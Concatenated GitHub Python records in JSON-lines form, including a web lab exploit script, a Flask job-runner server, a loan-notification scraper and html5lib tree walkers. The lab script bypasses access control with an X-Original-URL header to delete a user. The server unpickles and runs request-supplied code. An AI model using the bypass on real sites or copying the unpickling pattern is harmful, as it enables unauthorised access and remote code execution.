window.exitonclick()\n\ndraw_square()\n","repo_name":"chukycheese/udacity_courses","sub_path":"programming_foundations_with_python/3_use_classes_draw_turtles/6_change_turtle_shape_color_and_speed.py","file_name":"6_change_turtle_shape_color_and_speed.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21993511215","text":"#! /usr/bin/python2\n\nfrom subprocess import *\n\nprogram_path = \"./bin/miaKU\"\ndata_path = \"../data/MIA_KU_2015_DataSet/\"\nlog_path = \"../output/\"\nnum_samples_per_image = 10000\nparams_num_trees = [10, 20, 30, 40, 50]\nparams_num_tests = [100, 150]\nparams_max_depth = [10, 11, 12, 13, 14, 15]\n\nif __name__ == \"__main__\":\n\tnum_total = len(params_num_trees) * len(params_num_tests) * len(params_max_depth)\n\tnum_processed = 0\n\tprint(\"Running %d tests...\" % (num_total))\n\tfor num_trees in params_num_trees:\n\t\tfor num_tests in params_num_tests:\n\t\t\tfor max_depth in params_max_depth:\n\t\t\t\ttry:\n\t\t\t\t\tsubproc = Popen([program_path, \"--dataset\", data_path, \"--log\", log_path, \"--use_xvalidation\", \"--enable_bagging\", \"--num_samples\", str(num_samples_per_image), \"--num_trees\", str(num_trees), \"--max_depth\", str(max_depth), \"--num_feature_tests\", str(num_tests)],\n\t\t\t\t\t\tstdout=PIPE)\n\t\t\t\t\tsubproc.communicate()\n\t\t\t\texcept:\n\t\t\t\t\tprint(\"Some error in the subprocess occured...\") # just make sure to keep on running!\n\t\t\t\tnum_processed += 1\n\t\t\t\tprint(\"%d/%d\" % (num_processed, num_total))","repo_name":"Nalaxon/mia_randomforestclassifier","sub_path":"code/batch.py","file_name":"batch.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9232818443","text":"from flask import Flask\nfrom flask import request\nfrom flask import Response\nfrom queue import Queue\nimport signal\nimport time\nimport importlib\nimport base64\nimport sys\nimport traceback\nimport pickle\nimport threading\nimport os\n\nimport threading\nimport inspect\nimport ctypes\n\napp = Flask(__name__)\n\nRUNNING_THREAD = None\n\nclass RedirectOutput(object):\n encoding = 'UTF-8'\n def __init__(self, stream, name):\n self.stream = stream\n self.name = name\n self.buffer = None\n self._wrapped = False\n def write(self, data):\n self.stream.put(pickle.dumps([self.name, data]))\n def writelines(self, datas):\n self.stream.put(pickle.dumps([self.name, datas]))\n def flush(self):\n pass\n def __getattr__(self, attr):\n raise\n return getattr(self.stream, attr)\n\n \nclass KillableThread(threading.Thread):\n def kill(self):\n # To be honest I don't actaully understand why this works.\n # I'm not sure if it's even supposed to or just happens to...\n # So not \"you are not supposed to understand this\"\n # But also I guess \"I am not supposed to understand this\"?\n if not self.is_alive():\n return\n \n for tid, tobj in threading._active.items():\n if tobj is self:\n break\n else:\n raise Exception(\"There's no active thread.\")\n tid = ctypes.c_long(tid)\n \n res = ctypes.pythonapi.PyThreadState_SetAsyncExc(tid,\n ctypes.py_object(SystemExit))\n if res == 0:\n raise Exception(\"Invalid thread.\")\n elif res == 1:\n pass # Everything's great\n else:\n ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, None)\n raise Exception(\"Something went very wrong when killing a thread.\")\n\n\ndef do_it__I_AM_BACKGROUND_DONT_RELOAD(path, name, which, args, result):\n path = base64.b64decode(path.replace(\"_\",\"/\")).decode('ascii')\n name = base64.b64decode(name.replace(\"_\",\"/\")).decode('ascii')\n which = base64.b64decode(which.replace(\"_\",\"/\")).decode('ascii')\n args, kwargs = pickle.loads(base64.b64decode(args.replace(\"_\",\"/\")))\n fout = RedirectOutput(result, 'stdout')\n ferr = RedirectOutput(result, 'stderr')\n stdout, stderr = sys.stdout, sys.stderr\n sys.stdout, sys.stderr = fout, ferr\n res = None\n try:\n if path not in sys.path:\n sys.path.append(path)\n os.chdir(path)\n if name not in sys.modules:\n module = __import__(name)\n else:\n module = __import__(name)\n importlib.reload(module)\n if which != '__DONOTHING__':\n # When we are running a script top-down, then we pass this donothing.\n res = getattr(module, which)(*args, **kwargs)\n result.put(pickle.dumps([\"result\", res]))\n except Exception as err:\n exc = traceback.format_exc()\n result.put(pickle.dumps([\"traceback\", exc]))\n finally:\n sys.stdout, sys.stderr = stdout, stderr\n\n \n@app.route(\"/do/\", methods=['POST'])\ndef do():\n global RUNNING_THREAD\n\n path = request.form['module_name']\n name = request.form['file_name']\n function = request.form['function_name']\n args = request.form['arguments']\n \n if RUNNING_THREAD is not None:\n print(\"ERROR!! Tried to start a job when a prior job is still running. Cowardly refusing.\")\n return \"NACK\"\n\n result = Queue()\n RUNNING_THREAD = KillableThread(target=do_it__I_AM_BACKGROUND_DONT_RELOAD, args=[path, name, function, args, result])\n RUNNING_THREAD.start()\n\n def generate():\n global RUNNING_THREAD\n # race condition here\n while RUNNING_THREAD and RUNNING_THREAD.is_alive():\n while not result.empty():\n top = result.get()\n yield base64.b64encode(top)+b\"\\n\"\n time.sleep(.1)\n # check once more for data... 'cause we waited I guess it's safe?\n while not result.empty():\n top = result.get()\n yield base64.b64encode(top)+b\"\\n\"\n RUNNING_THREAD = None\n\n return Response(generate())\n\n@app.route(\"/kill\", methods=['GET'])\ndef kill():\n global RUNNING_THREAD\n if RUNNING_THREAD is not None:\n RUNNING_THREAD.kill()\n RUNNING_THREAD = None\n return \"ok\"\n\n@app.route(\"/status\", methods=['GET'])\ndef status():\n return \"alive\"\n\n\ndef handler(signum, frame):\n exit(1)\n \n \nsignal.signal(signal.SIGINT, handler) \n\nif __name__ == \"__main__\":\n app.run(threaded=True, port=19568)\n","repo_name":"carlini/pycallcc","sub_path":"pycallcc/background.py","file_name":"background.py","file_ext":"py","file_size_in_byte":4606,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"53"} +{"seq_id":"12472323572","text":"menu='''\nSelect an operation to perform on two numbers\n\n\"+\" to add\n\"-\" to substract\n\"*\" to multiply\n\"/\" to divide\n\"q\" to quit\n\nPlease enter your chooice :'''\n\nchoices=[\"+\",\"-\",\"*\",\"/\",\"q\"]\ncalc=input(menu).lower()\n\nwhile (calc!=\"q\"):\n if calc in choices:\n a=int(input(\"Enter no.1 : \"))\n b=int(input(\"Enter no.2 : \"))\n if calc==\"+\":\n sum=a+b\n print(f\" The sum : {sum}\")\n elif calc==\"-\":\n diff=a-b\n pirnt(f\"The difference : {diff}\")\n elif calc==\"*\":\n mul=a*b\n print(f\"The product : {mul}\")\n elif calc==\"/\":\n divs=a/b\n print(f\"The division : {divs}\")\n else:\n print(\"\\nInvalid option\")\n\n calc=input(menu).lower()\n \n","repo_name":"Access7-s/Python-Exercise","sub_path":"Python exercises Beginners/calcuntilq.py","file_name":"calcuntilq.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4898171278","text":"from flask import Flask, jsonify\nfrom flask_cors import CORS\n\nimport librosa\n\n\napp = Flask(__name__)\nCORS(app)\n\n\n@app.route(\"/\")\ndef home():\n return \"Home\"\n\n\n@app.route(\"/nutcracker\")\ndef nutcracker():\n filename = librosa.example('nutcracker')\n y, sr = librosa.load(filename)\n tempo, beat_frames = librosa.beat.beat_track(y=y, sr=sr)\n response = {\n 'title': 'Nutcracker',\n 'tempo': tempo,\n 'key': 'C Major'\n }\n return jsonify(response)\n\n\n@app.route(\"/sweetwaltz\")\ndef sweetwaltz():\n filename = librosa.example('sweetwaltz')\n y, sr = librosa.load(filename)\n tempo, beat_frames = librosa.beat.beat_track(y=y, sr=sr)\n response = {\n 'title': 'Sweet Waltz',\n 'tempo': tempo,\n 'key': 'C Major'\n }\n return jsonify(response)\n\n\n@app.route(\"/fishin\")\ndef fishin():\n filename = librosa.example('fishin')\n y, sr = librosa.load(filename)\n tempo, beat_frames = librosa.beat.beat_track(y=y, sr=sr)\n response = {\n 'title': 'Fishin',\n 'tempo': tempo,\n 'key': 'C Major'\n }\n return jsonify(response)\n","repo_name":"arvindeva/api-project-backend","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8810700891","text":"# URL-based access control can be circumvented\n\nimport sys\nimport requests\nimport urllib3\nimport urllib.parse\nimport re\nimport time\nimport warnings\nfrom bs4 import BeautifulSoup\n\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nproxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}\n\n##########################################################\n#\tFUNCTIONS\n##########################################################\n\ndef find_admin_panel(s, url):\n\tprint('\\n[+] Searching admin panel adding X-Original-URL header...')\n\theaders = {'X-Original-URL': '/admin'}\n\tr = s.get(url, headers=headers)\n\ttime.sleep(1)\n\tif r.status_code == 200 and '/admin/delete?username=' in r.text:\n\t\tprint('[+] Found admin panel !\\n')\n\treturn r\n\ndef delete_carlos(s, url):\n\tprint('[+] Trying to delete Carlos user adding X-Original-URL header...')\n\tdelete_headers = {'X-Original-URL': '/admin/delete'}\n\tdelete_path = url + '/?username=carlos'\n\tr = s.get(delete_path, headers=delete_headers)\n\ttime.sleep(1)\n\tprint('[+] Checking that Carlos user have been removed...')\n\tr = find_admin_panel(s, url)\n\tif not 'carlos' in r.text:\n\t\tprint('[+] Successfully removed Carlos user !')\n\telse:\n\t\tprint('[-] Exploit failed to remove Carlos user !!!')\n\t\tsys.exit(1)\n\ndef show_usage():\n\tprint('[+] Usage: %s ' % sys.argv[0])\n\tprint('[+] Example: %s https://www.target.com' % sys.argv[0])\n\tsys.exit(-1)\n\n##########################################################\n#\tMAIN\n##########################################################\n\ndef main():\n\tprint('[+] Lab: URL-based access control can be circumvented')\n\ttry:\n\t\turl = sys.argv[1].strip()\n\texcept IndexError:\n\t\tshow_usage()\n\ts = requests.Session()\n\ts.proxies = proxies\t\t# Comment this line to disable proxying\n\ts.verify = False\n\ttry:\n\t\tr = s.get(url, allow_redirects=False)\n\t\ttime.sleep(1)\n\t\tif '

Error

' in r.text or 'Server Error: Gateway Timeout' in r.text:\n\t\t\tprint('\\n[-] HOST seems to be down ')\n\t\t\tsys.exit(-1)\n\t\telse:\n\t\t\tprint('[+] Trying to find Unprotected admin panel...\\n')\n\t\t\ttime.sleep(1)\n\t\t\tparsed_url = urllib.parse.urlparse(url)\n\t\t\thost = parsed_url.netloc\n\t\t\tif parsed_url.port:\n\t\t\t\tport = parsed_url.port\n\t\t\telif parsed_url.scheme == \"https\":\n\t\t\t\tport = 443\n\t\t\telif parsed_url.scheme == \"http\":\n\t\t\t\tport = 80\n\t\t\tprint(parsed_url)\n\t\t\turl = parsed_url.scheme + '://' + host\n\t\t\ttime.sleep(2)\n\t\t\tr = find_admin_panel(s, url)\n\t\t\tr = delete_carlos(s, url)\n\t\t\ts.cookies.clear()\n\t\t\ttime.sleep(2)\n\t\t\tr = s.get(url)\n\t\t\tif 'Congratulations, you solved the lab!' in r.text:\n\t\t\t\tprint('\\n[+] The lab is solved !')\n\texcept requests.exceptions.ProxyError:\n\t\tprint('[-] PROXY seems to be missconfigured ')\n\texcept KeyboardInterrupt:\n\t\tsys.exit(0)\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"gwyomarch/WebSecurityAcademy","sub_path":"AccessControl/exploit-lab10.py","file_name":"exploit-lab10.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74232510889","text":"import random\n\nlist_a = []\n\nfor i in range(4) :\n list_a.append(random.randint(1,100))\n\nlist_a.sort()\n\nprint(list_a)\n\n#########\n\nans = random.randint(1,10)\n\nwhile(1) :\n choice = int(input(\"숫자를 맞춰\"))\n\n if choice == ans :\n print(\"정답\")\n break\n else:\n print(\"땡\")\n\n#############\n\nlotto = random.sample(range(45), 6)\n\nprint(lotto)","repo_name":"Kminseokk/sf3_10_python","sub_path":"day231110/study07.py","file_name":"study07.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21073832542","text":"import pandas as pd\nimport namen_prep\nimport streamlit as st\n\ndef drop_niet_blokken(df):\n '''Unit is een combinatie van 4 cijfers als het om een overkoepelende term gaat.\n Door alleen de regels over te houden waar unit uit meer dan 4 characters bestaat,\n houden we de regels over blokken over.'''\n dataf = df.copy()\n return dataf.loc[dataf.Unit.str.len() > 4, ]\n\n@st.cache(suppress_st_warning=True)\ndef prep_onderwijs_data():\n files = ['Data/BROS HSR realisations 2019-2020, 14.5.2022-Blokcoordinatoren en planningsgroepsleden.xlsx',\n 'Data/BROS HSR realisations 2020-2021, 11.2.2022-Blokcoordinatoren en planningsgroepsleden.xlsx',\n 'Data/BROS HSR realisations 2021-2022, 14.5.2022-Blokcoordinatoren en planningsgroepsleden.xlsx']\n\n onderwijs = pd.DataFrame()\n\n # zet alle jaren in 1 df\n for jaar, filename in zip(range(2019, 2022), files):\n onderwijs = pd.concat([onderwijs, (pd.read_excel(filename,\n sheet_name='Realisations')\n .dropna(subset=['Unit'])\n .assign(Year=jaar)\n .pipe(drop_niet_blokken)\n .drop_duplicates())],\n axis=0)\n \n onderwijs['UnitYear'] = [f\"{unit}_{year}\" for unit, year in zip(onderwijs['Unit'], onderwijs['Year'])]\n onderwijs['Prefix'] = onderwijs['Prefix'].fillna('')\n onderwijs['Naam'] = (onderwijs.Initials + \" \" + onderwijs.Prefix + \" \" + onderwijs.Name).str.replace(\" \", \" \").str.replace(\" \", \" \")\n\n # selecteer alleen vaste staf\n onderwijs['is_vaste_staf'] = onderwijs.Name.apply(namen_prep.check_if_vaste_staf_achternaam)\n onderwijs = onderwijs.loc[onderwijs.is_vaste_staf, ]\n\n # zorg dat namen gelijk geschreven zijn als in Pure/Onderzoek\n missing_before = onderwijs['Naam'].isnull().sum()\n onderwijs['Naam'] = [namen_prep.onderwijsnaam_naar_onderzoeksnaam(naam) for naam in onderwijs['Naam'].values]\n missing_after = onderwijs['Naam'].isnull().sum()\n assert missing_before == missing_after\n\n return onderwijs\n\n\n@st.cache(suppress_st_warning=True)\ndef prep_supervisie_data():\n\n sv1 = pd.read_excel('Data/Promovendi HSR 20220602.xlsx', sheet_name='PhD programme')\n sv2 = (pd.read_excel('Data/HSR promoties 01012021 tot 01072022.xlsx', sheet_name='PhD programme')\n .drop(['PhD defense date', 'Duration from PhD starting date until PhD defense date'], axis=1))\n\n assert (sv1.columns.values == sv2.columns.values).all()\n\n # Combineer huidige PhDs en in afgelopen jaar gepromoveerde PhDs\n sv = pd.concat([sv1, sv2], axis=0)\n\n # maak dummy kolommen voor de 4 supervisors en verbindt deze met PhD naam\n supervisor_df = sv['Assigned supervisors'].str.split(',', expand=True)\n ties_prep = pd.concat([sv['Full name'], supervisor_df], axis=1)\n\n # van breed naar long (met kolommen PhD name en Name (v supervisor))\n ties_long = (pd.melt(ties_prep, id_vars='Full name',\n value_vars=supervisor_df.columns,\n var_name='supervisor_nr',\n value_name='Name')\n .sort_values('Full name')\n .rename(columns={'Full name': 'PhD name'})\n .drop('supervisor_nr', axis=1)\n .dropna())\n\n # selecteer alleen rijen met vaste stafleden\n ties_long['achternaam'] = ties_long['Name'].str.split().str[-1]\n ties_long['is_vaste_staf'] = ties_long['achternaam'].apply(namen_prep.check_if_vaste_staf_achternaam)\n ties_long = ties_long.loc[ties_long.is_vaste_staf, ]\n\n # alle PhDs waar slechts 1 HSR vaste staf supervisor is kunnen weg, want daar is geen 'samenwerking'\n # koppel hiervoor de value counts van de PhD naam (op dit moment zijn er alleen regels met vaste staf supervisors in de long data)\n vc = ties_long['PhD name'].value_counts().to_frame('nr_of_HSR_supervisors')\n vc.index.name='PhD name'\n ties = ties_long.merge(vc, on='PhD name', how='left')\n ties = ties[ties['nr_of_HSR_supervisors'] > 1]\n\n # zorg dat namen gelijk geschreven zijn als in Pure/Onderzoek\n ties['Name'] = ties['Name'].str.replace('.', '').str.strip()\n missing_before = ties['Name'].isnull().sum()\n ties['Name'] = [namen_prep.supervisornaam_naar_onderzoeksnaam(naam) for naam in ties['Name'].values]\n missing_after = ties['Name'].isnull().sum()\n assert missing_before == missing_after\n\n return ties","repo_name":"NHameleers/heidag_netwerken","sub_path":"data_prep.py","file_name":"data_prep.py","file_ext":"py","file_size_in_byte":4499,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4238661175","text":"import datetime\nimport json\n\nimport environment\nimport requests\nimport scheduler\nimport cacheing\nimport creds_parser\nimport os\nimport global_vars\n\nharmoney_email = harmoney_pwd = \"\"\n\n# ALG_VARS\nperiod = 10.0 # Called every 10 seconds\nseen_loan_ids = []\n\n# CACHE STORAGE\nrel_path = \"./cache/nz_harmoney.txt\"\nservice_name = \"Harmoney\"\n\n\ndef send_auth_req():\n sign_in_url = \"https://app.harmoney.com/accounts/sign_in\"\n sign_in_payload = \"{\\n \\\"branch\\\": \\\"NZ\\\",\\n \\\"account\\\": {\\n \\\"email\\\": \\\"\" + harmoney_email + \"\\\",\\n \\\"password\\\": \\\"\" + harmoney_pwd + \"\\\"\\n\\t}\\n}\"\n sign_in_headers = {\n 'cookie': \"_harmoney_session_id=SXB5MWh3VTZZdVVHZXVoT0FxKzI1WHRwRE8yVnk4QkVDbDhMTEJoUGFlZFJCeDhOdWlCVHFzZ2VReU1SQVFHTFYzdU0rc2lvdG1OVFBHZnRieWZPUWtFRUMrM3pqVEg1N3dPWkRUSTNMMFlWZi9yL0tQcDUyMXEzbWl0Yk5BWTIyMTlzanpYRGk2S3h3bmtybFJuMGNFVEdvRWkzV0VwSy9rWk9WdEllOHZMYjVWZmlkbUtPbFBERkhnTFNqbWRqV21WZy95MlAvbUdUWHZTRHlzalNGalFRQjhyWlhtTmlZUFlPOVZFZ20vUm4rUnBGNHFYYzVYK2xoamZXMk5VV2g3NmlpdU85cTAyZnN0TFRNWU1FUmZYaHV5Y1NZdWZsazZYR3UzZVBSc1ZxdG5TR2gwVldMUU1jV3FkZ0pzNlJqNFNBd1c2UjFVaDIrbmJMd0xEQmxUdWw3MUhaamozVnBrVnF4eFhoQ2YxRE5wWjJzQm1GekY1Q0lIbWt1RktKZTJYcXo3bUtnV2tHOXJhNmF3a3N6MTc1ZHFCN0FSanJqQTgwb3RMWWNsVUlSWkZLaDBuM3A0M1dWOTNUajVTN2tIeUsxWmNQc0VoV3JnczgyRUg2U0NQUHA2NlVvcnV4ZjNWQkRKUTRDdStaYTY0dmhGTTFVcUxOdm9LekNKZ0VDcVZYb091aTRkaFdwaUpkZlRjTGV4UU5OaEwxS3UrL05XR2t6TSt1dVUwPS0tWmEyRW5pLzhYVXh5MWZ1aDM1Q2cvQT09--dc79b054f8453fcc20e22a6263d276ebb3a56790\",\n 'user-agent': \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/72.0.3626.121 Safari/537.36\",\n 'referer': \"https://www.harmoney.co.nz/sign-in\",\n 'origin': \"https://www.harmoney.co.nz\",\n 'content-type': \"application/json\",\n 'accept': \"application/json\"\n }\n return requests.request(\"POST\", sign_in_url, data=sign_in_payload, headers=sign_in_headers)\n\n\ndef send_loan_query(cookie):\n # GET LOANS\n get_loans_url = \"https://app.harmoney.com/api/v1/investor/marketplace/loans\"\n get_loans_querystring = {\"limit\": \"100\", \"offset\": \"0\"}\n headers = {\n 'pragma': \"no-cache\",\n 'host': \"app.harmoney.com\",\n 'dnt': \"1\",\n 'connection': \"keep-alive\",\n 'cache-control': \"no-cache\",\n 'accept-encoding': \"gzip, deflate, br\",\n 'accept': \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\",\n 'user-agent': \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/72.0.3626.121 Safari/537.36\",\n 'content-type': \"'application/x-www-form-urlencoded'\"\n }\n return requests.request(\"GET\", get_loans_url, cookies=cookie, headers=headers, params=get_loans_querystring)\n\n\ndef build_email_body(loan_details):\n email_body = \"\" \\\n \"

Hello,

\" \\\n \"

A new loan has just been listed, please sign in and review the loan if you're interested in \" \\\n \"investing.

\" \\\n \"

Go to https://www.harmoney.co.nz to log-in and view the new loan

\"\n\n email_body += \"

Loan Details:

\"\n\n for loan_info in loan_details:\n email_body += \\\n \"

Loan Grade: \" + loan_info['grade'] + \"

\" \\\n \"

Interest Rate: \" + str(\n loan_info['interest_rate']) + \"%

\" \\\n \"

Loan Amount : $\" + str(loan_info['loan_amount']) + \"

\" \\\n \"

Percentage Funded: \" + str(\n loan_info['percentage_funded']) + \"%

\" \\\n \"

Term Length: \" + str(loan_info['term_length']) + \"

\" \\\n \"

Purpose: \" + \\\n loan_info['purpose'] + \"

\"\n\n email_body += \"

Regards,

\"\n email_body += \"

Chris Connolly

\"\n email_body += \"\"\n\n return email_body\n\n\ndef send_email(loan_details):\n email_body = build_email_body(loan_details)\n who_from, who_to, subject, = environment.get_mail_metadata_from_platform_name(service_name)\n print(who_from, who_to, subject)\n try:\n r = requests.post(\n \"https://api.mailgun.net/v3/p2pnotifications.live/messages\",\n auth=(\"api\", os.getenv(\"MG_API_KEY\")),\n data={\n \"from\": who_from,\n \"to\": who_to,\n \"subject\": subject,\n \"html\": email_body\n }\n )\n r.raise_for_status()\n \n except requests.exceptions.HTTPError as errh:\n print (\"Http Error:\",errh)\n global_vars.bugsnag_conf.notify(errh)\n except requests.exceptions.ConnectionError as errc:\n print (\"Error Connecting:\",errc)\n global_vars.bugsnag_conf.notify(errh)\n except requests.exceptions.Timeout as errt:\n print (\"Timeout Error:\",errt)\n global_vars.bugsnag_conf.notify(errh)\n except requests.exceptions.RequestException as err:\n print (\"OOps: Something Else\",err)\n global_vars.bugsnag_conf.notify(errh)\n\n# If the ID of a stored loan doesn't exist in a response,\n# we can assume its been filled and can remove it.\ndef remove_old_loans(response):\n global seen_loan_ids\n loans_after_removal = []\n\n for stored_loan_id in seen_loan_ids:\n in_response = False\n for loan_from_req in response['items']:\n if stored_loan_id == loan_from_req['id']:\n in_response = True\n break\n\n if in_response:\n loans_after_removal.append(stored_loan_id)\n\n seen_loan_ids = loans_after_removal\n\n\n# TASK TO RETRIEVE NEW LOANS RUN EVERY MINUTE\ndef get_loans():\n response = send_auth_req()\n c = response.cookies # RETRIEVE COOKIE INSIDE RESPONSE\n\n # USE COOKIE RESPONSE IN NEW REQUEST AS TOKEN\n response = send_loan_query(c)\n json_resp = json.loads(response.text)\n\n return json_resp\n\n\ndef get_new_loans(response):\n global seen_loan_ids\n # Have we seen it before?\n new_loan_avail = False\n new_loan_details = []\n for loan in response['items']:\n if loan['id'] not in seen_loan_ids:\n seen_loan_ids.append(loan['id'])\n loan_info = {\n 'grade': loan['grade'],\n 'interest_rate': loan['interest_rate'],\n 'loan_amount': loan['amount'],\n 'term_length': str(loan['term']) + \" months\",\n 'purpose': loan['loan_purpose'],\n 'percentage_funded': round(float(loan['amount_funded']) / float(loan['amount']) * 100, 2)\n }\n new_loan_details.append(loan_info)\n new_loan_avail = True\n\n return new_loan_avail, new_loan_details\n\n\ndef job():\n print(\"Running\", service_name, \"Job. Current DateTime:\", datetime.datetime.today())\n\n response = get_loans()\n loan_available = response['total_count'] != 0\n if loan_available:\n new_loan_avail, new_loan_details = get_new_loans(response)\n\n if new_loan_avail:\n print(\"Sending\", service_name, \"email at\", datetime.datetime.today())\n send_email(new_loan_details)\n\n # Remove old loans\n remove_old_loans(response)\n cacheing.update_cache(rel_path, seen_loan_ids)\n\n\ndef init():\n print(\"Initialising\", service_name, \"Script\")\n global seen_loan_ids\n seen_loan_ids = cacheing.init_cache(rel_path)\n\n # Load credentials into memory\n global harmoney_email, harmoney_pwd\n harmoney_email, harmoney_pwd = creds_parser.get_credentials_by(service_name)\n print(\"Finished Initialising\", service_name, \"Script\")\n\n # Schedule tasks\n scheduler.schedule_tasks(period, job)\n\n\ndef send_test_dict_email():\n f = open('./samples/nz_harmoney.txt')\n response = eval(f.read().strip())\n new_loan_avail, new_loan_details = get_new_loans(response)\n send_email(new_loan_details)\n assert new_loan_avail is True and new_loan_details != []\n\n\n","repo_name":"chrisc96/P2PLendingNotifier","sub_path":"nz_harmoney.py","file_name":"nz_harmoney.py","file_ext":"py","file_size_in_byte":8225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14135781913","text":"import gettext\n_ = gettext.gettext\n\nfrom html5lib.constants import voidElements, spaceCharacters\nspaceCharacters = u\"\".join(spaceCharacters)\n\nclass TreeWalker(object):\n def __init__(self, tree):\n self.tree = tree\n\n def __iter__(self):\n raise NotImplementedError\n\n def error(self, msg):\n return {\"type\": \"SerializeError\", \"data\": msg}\n\n def normalizeAttrs(self, attrs):\n newattrs = {}\n if attrs:\n #TODO: treewalkers should always have attrs\n for (namespace,name),value in attrs.iteritems():\n namespace = unicode(namespace) if namespace else None\n name = unicode(name)\n value = unicode(value)\n newattrs[(namespace,name)] = value\n return newattrs\n\n def emptyTag(self, namespace, name, attrs, hasChildren=False):\n yield {\"type\": \"EmptyTag\", \"name\": unicode(name), \n \"namespace\":unicode(namespace),\n \"data\": self.normalizeAttrs(attrs)}\n if hasChildren:\n yield self.error(_(\"Void element has children\"))\n\n def startTag(self, namespace, name, attrs):\n return {\"type\": \"StartTag\", \n \"name\": unicode(name),\n \"namespace\":unicode(namespace),\n \"data\": self.normalizeAttrs(attrs)}\n\n def endTag(self, namespace, name):\n return {\"type\": \"EndTag\", \n \"name\": unicode(name),\n \"namespace\":unicode(namespace),\n \"data\": {}}\n\n def text(self, data):\n data = unicode(data)\n middle = data.lstrip(spaceCharacters)\n left = data[:len(data)-len(middle)]\n if left:\n yield {\"type\": \"SpaceCharacters\", \"data\": left}\n data = middle\n middle = data.rstrip(spaceCharacters)\n right = data[len(middle):]\n if middle:\n yield {\"type\": \"Characters\", \"data\": middle}\n if right:\n yield {\"type\": \"SpaceCharacters\", \"data\": right}\n\n def comment(self, data):\n return {\"type\": \"Comment\", \"data\": unicode(data)}\n\n def doctype(self, name, publicId=None, systemId=None, correct=True):\n return {\"type\": \"Doctype\",\n \"name\": name is not None and unicode(name) or u\"\",\n \"publicId\": publicId,\n \"systemId\": systemId,\n \"correct\": correct}\n\n def entity(self, name):\n return {\"type\": \"Entity\", \"name\": unicode(name)}\n\n def unknown(self, nodeType):\n return self.error(_(\"Unknown node type: \") + nodeType)\n\nclass RecursiveTreeWalker(TreeWalker):\n def walkChildren(self, node):\n raise NodeImplementedError\n\n def element(self, node, namespace, name, attrs, hasChildren):\n if name in voidElements:\n for token in self.emptyTag(namespace, name, attrs, hasChildren):\n yield token\n else:\n yield self.startTag(name, attrs)\n if hasChildren:\n for token in self.walkChildren(node):\n yield token\n yield self.endTag(name)\n\nfrom xml.dom import Node\n\nDOCUMENT = Node.DOCUMENT_NODE\nDOCTYPE = Node.DOCUMENT_TYPE_NODE\nTEXT = Node.TEXT_NODE\nELEMENT = Node.ELEMENT_NODE\nCOMMENT = Node.COMMENT_NODE\nENTITY = Node.ENTITY_NODE\nUNKNOWN = \"<#UNKNOWN#>\"\n\nclass NonRecursiveTreeWalker(TreeWalker):\n def getNodeDetails(self, node):\n raise NotImplementedError\n \n def getFirstChild(self, node):\n raise NotImplementedError\n \n def getNextSibling(self, node):\n raise NotImplementedError\n \n def getParentNode(self, node):\n raise NotImplementedError\n\n def __iter__(self):\n currentNode = self.tree\n while currentNode is not None:\n details = self.getNodeDetails(currentNode)\n type, details = details[0], details[1:]\n hasChildren = False\n endTag = None\n\n if type == DOCTYPE:\n yield self.doctype(*details)\n\n elif type == TEXT:\n for token in self.text(*details):\n yield token\n\n elif type == ELEMENT:\n namespace, name, attributes, hasChildren = details\n if name in voidElements:\n for token in self.emptyTag(namespace, name, attributes, \n hasChildren):\n yield token\n hasChildren = False\n else:\n endTag = name\n yield self.startTag(namespace, name, attributes)\n\n elif type == COMMENT:\n yield self.comment(details[0])\n\n elif type == ENTITY:\n yield self.entity(details[0])\n\n elif type == DOCUMENT:\n hasChildren = True\n\n else:\n yield self.unknown(details[0])\n \n if hasChildren:\n firstChild = self.getFirstChild(currentNode)\n else:\n firstChild = None\n \n if firstChild is not None:\n currentNode = firstChild\n else:\n while currentNode is not None:\n details = self.getNodeDetails(currentNode)\n type, details = details[0], details[1:]\n if type == ELEMENT:\n namespace, name, attributes, hasChildren = details\n if name not in voidElements:\n yield self.endTag(namespace, name)\n if self.tree is currentNode:\n currentNode = None\n break\n nextSibling = self.getNextSibling(currentNode)\n if nextSibling is not None:\n currentNode = nextSibling\n break\n else:\n currentNode = self.getParentNode(currentNode)\n","repo_name":"livid/v2ex-gae","sub_path":"html5lib/treewalkers/_base.py","file_name":"_base.py","file_ext":"py","file_size_in_byte":5936,"program_lang":"python","lang":"en","doc_type":"code","stars":3095,"dataset":"github-code","pt":"53"} +{"seq_id":"20975112295","text":"from aws_lambda_powertools.utilities.data_classes.api_gateway_proxy_event import APIGatewayEventRequestContext\nfrom aws_lambda_powertools import Logger\n\nfrom my_cognito_lambda.exception.error_code_enum import ErrorCodeEnum\nfrom my_cognito_lambda.exception.unauthorized_exception import UserPlatformDemoError\nfrom my_cognito_lambda.utils.conext_extractor import ContextExtractor\n\nlogger = Logger()\ncontext_extractor = ContextExtractor()\n\n\nclass 